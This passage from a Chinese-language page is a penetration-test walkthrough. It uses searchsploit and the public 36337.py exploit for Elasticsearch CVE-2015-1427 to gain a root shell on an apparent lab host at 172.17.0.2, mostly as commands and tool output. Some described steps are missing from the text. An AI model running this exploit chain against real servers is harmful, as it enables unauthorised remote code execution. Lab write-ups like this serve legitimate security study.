- 首页 > 生活百科 > >
- 发现新线索,
172.17.0.2
的 9200 端口开启,运行服务 Elasticsearch REST API 1.4.2 (name: Watcher; cluster: elasticsearch; Lucene 4.10.2) 说明:Elasticsearch 是位于 Elastic Stack 核心的分布式搜索和分析引擎
- 此处我们可以使用
searchsploit
查询 Elasticsearch 相关漏洞并尝试,攻入其中
──(kali?kali)-[~/Workspace]└─$ searchsploit Elasticse130 ?----------------------------------------------------------------------------------------- ---------------------------------Exploit Title|Path----------------------------------------------------------------------------------------- ---------------------------------ElasticSearch - Remote Code Execution| linux/remote/36337.pyElasticSearch - Remote Code Execution| multiple/webapps/33370.htmlElasticSearch - Search Groovy Sandbox Bypass (Metasploit)| java/remote/36415.rbElasticSearch 1.6.0 - Arbitrary File Download| linux/webapps/38383.pyElasticSearch 7.13.3 - Memory disclosure| multiple/webapps/50149.pyElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal| php/webapps/37054.pyElasticSearch Dynamic Script - Arbitrary Java Execution (Metasploit)| java/remote/33588.rbElasticsearch ECE 7.13.3 - Anonymous Database Dump| multiple/webapps/50152.py----------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results
- 尝试一个
/usr/share/exploitdb/exploits/linux/remote/36337.py
但注意是否安装 python2
以及其 requests
如果没有使用以下代码
sudo apt-get install python2# 安装 python2wget https://bootstrap.pypa.io/pip/2.7/get-pip.py && python2 get-pip.py# 安装 python2 的 pip2 如果有就跳过此步python2 -m pip install requests# 安装 requests 包proxychains4 -f ./proxychains.conf python2 /usr/share/exploitdb/exploits/linux/remote/36337.py 172.17.0.2# 利用 36337.py 脚本
进入其中
──(kali?kali)-[~/Workspace]└─$ proxychains4 -f ./proxychains.conf python2 36337.py 172.17.0.2[proxychains] config file found: ./proxychains.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16▓███████▓▄▄▄██████ ▄▄▄█████▓ ██▓ ▄████▄████████? ██ ▓███████▓██▓▓█? ▓██??████▄?██? ▓██? ▓?▓██??██? ?█?██? ▓██? ██?▓█? ▓██?▓██??███?██??██?█▄? ▓██▄? ▓██? ???██??▓█▄ ? ▓██▄?██??██??███?██??██??▓█▄ ?██??██▄▄▄▄██?██?? ▓██▓ ? ?██??▓▓▄ ▄██??██??▓█ ?██ ?▓█▄ ?██??██???████??██████?▓█▓██??██████???██? ? ?██?? ▓███? ??██████???▓█??██▓??████??██████??██████??? ?? ?? ??▓???▓?█?? ?▓? ? ?? ???▓? ?? ??? ?▓? ? ? ? ??????? ?? ?? ??▓?? ??▓?? ??? ? ?? ??? ?? ??? ??? ???? ??? ? ? ??? ? ? ??? ? ??? ? ???? ???????? ???????? ??? ?? ?????????? ????????????Exploit for ElasticSearch , CVE-2015-1427Version: 20150309.1{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something~$
可以看到下面报错了,查看错误是 ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427) 想要要利用需要先查询时至少要求es中有一条数据,所以发送如下数据包,增加一个数据
┌──(kali?kali)-[~/Workspace]└─$ proxychains python2 a.py 172.17.0.2[proxychains] config file found: /etc/proxychains4.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16▓███████▓▄▄▄██████ ▄▄▄█████▓ ██▓ ▄████▄████████? ██ ▓███████▓██▓▓█? ▓██??████▄?██? ▓██? ▓?▓██??██? ?█?██? ▓██? ██?▓█? ▓██?▓██??███?██??██?█▄? ▓██▄? ▓██? ???██??▓█▄ ? ▓██▄?██??██??███?██??██??▓█▄ ?██??██▄▄▄▄██?██?? ▓██▓ ? ?██??▓▓▄ ▄██??██??▓█ ?██ ?▓█▄ ?██??██???████??██████?▓█▓██??██████???██? ? ?██?? ▓███? ??██████???▓█??██▓??████??██████??██████??? ?? ?? ??▓???▓?█?? ?▓? ? ?? ???▓? ?? ??? ?▓? ? ? ? ??????? ?? ?? ??▓?? ??▓?? ??? ? ?? ??? ?? ??? ??? ???? ??? ? ? ??? ? ? ??? ? ??? ? ???? ???????? ???????? ??? ?? ?????????? ????????????Exploit for ElasticSearch , CVE-2015-1427Version: 20150309.1{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something~$ id[proxychains] Strict chain...127.0.0.1:1080...172.17.0.2:9200...OKuid=0(root) gid=0(root) groups=0(root)~$
推荐阅读
-
-
长江索道买票了还要取号吗多少钱 长江索道买票了还要取号吗?
-
牙签肉是怎么腌制的窍门图片 牙签肉是怎么腌制的窍门
-
-
-
-
-
-
-
-
-
阴阳师妖怪屋20关地震鲶攻略-地震鲶打法及弱点分享您要知道知识
-
小苏打和食用碱的区别 小苏打是不是食用碱它们的区别
-
-
-
-
-
为什么今年菜鸟驿站都在转让2021 为什么今年菜鸟驿站都在转让
-
-